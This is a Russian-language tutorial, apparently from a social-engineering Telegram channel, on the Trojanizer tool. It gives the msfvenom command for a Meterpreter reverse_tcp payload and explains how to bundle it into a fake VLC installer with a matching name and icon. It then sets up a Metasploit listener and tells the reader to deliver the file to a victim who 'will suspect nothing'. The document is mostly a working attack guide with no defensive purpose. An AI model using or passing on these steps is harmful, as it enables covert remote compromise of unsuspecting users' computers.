Обзор и пара трюков с инструментом Trojanizer.
Social EngineeringИнструмент Trojanizer использует WinRAR (SFX), чтоб сжать два файла между собой и преобразовать их в исполняемый архив SFX (.exe). SFX-архив при работе запускает оба файла (наш payload и легальное приложение одновременно).
Скачиваем.
git clone https://github.com/r00t-3xp10it/trojanizer.git
Далее создаем пейлоад, используя msfvenom.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4466 -f exe > /root/Desktop/backdoor.exe
Запуск Trojanizer
Переходим в папку с Trojanizer и запускаем Trojanizer.sh файл. У Trojanizer есть зависимости, которые нужны для работы тулзы, он попробует их поставить сам, но в случае неудачи, установите следующие пакеты: Wine Program Files, WinRAR Software and Zenity.
После запуска откроется форма для сжатия. Здесь можно выбрать пейлоад, который мы создали, используя msfvenom, в самом начале.
После выбора пейлоада, откроется другое окно под названием Legit Application to Trojanize.
Далее нужно выбрать любой исполняемый файл (.exe), который хотим связать с нашей нагрузкой. Я связываю VLC Player Installer File с моей нагрузкой.
После того, как вы нажмете ОК, необходимо будет задать новое имя для файла. Сохраните его как файл инсталлятор. Например, vlc-32bit-Installer или vlc-update64 или по вашему выбору.
Теперь необходимо выбрать иконку для нашего инсталлятора. Вы можете выбрать из списка по умолчанию или загрузить любой файл с иконкой в формате (.ico) из Google.
Как можно видеть из приведенного выше скрина, я добавил файл vlc-icon.ico как иконку.
После выбора файла иконки выпадает окно, сообщающее путь к новому файлу инсталлятору.
А теперь давайте поднимем Listener в Metasploit:
msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.111 msf exploit(multi/handler) > set lport 4466 msf exploit(multi/handler) > run -j
Отправляем вредоносную программу на машину жертвы любым удобным способом.
Когда пользователь откроет файл, он получит обычное предупреждение о безопасности, как показано ниже.
После того, как жертва нажмет RUN, у пользователя начнет работать VLC installer, и он ничего не заподозрит.
Но в тоже время, у нас будет meterpreter сессия, как показано ниже.
Именно так можно связать файл нашу нагрузку с любым файлом программного обеспечения (.exe) с использованием Trojanizer.
Social Engineering - Канал посвященный психологии, социальной инженерии, профайлингу, НЛП, Хакингу, Анонимности и безопасности в сети интернет, Даркнету и все что с ним связано. Добро пожаловать ;-)
S.E.Book - Литература социального инженера.
@Social_Engineering_bot - Бот обратной связи.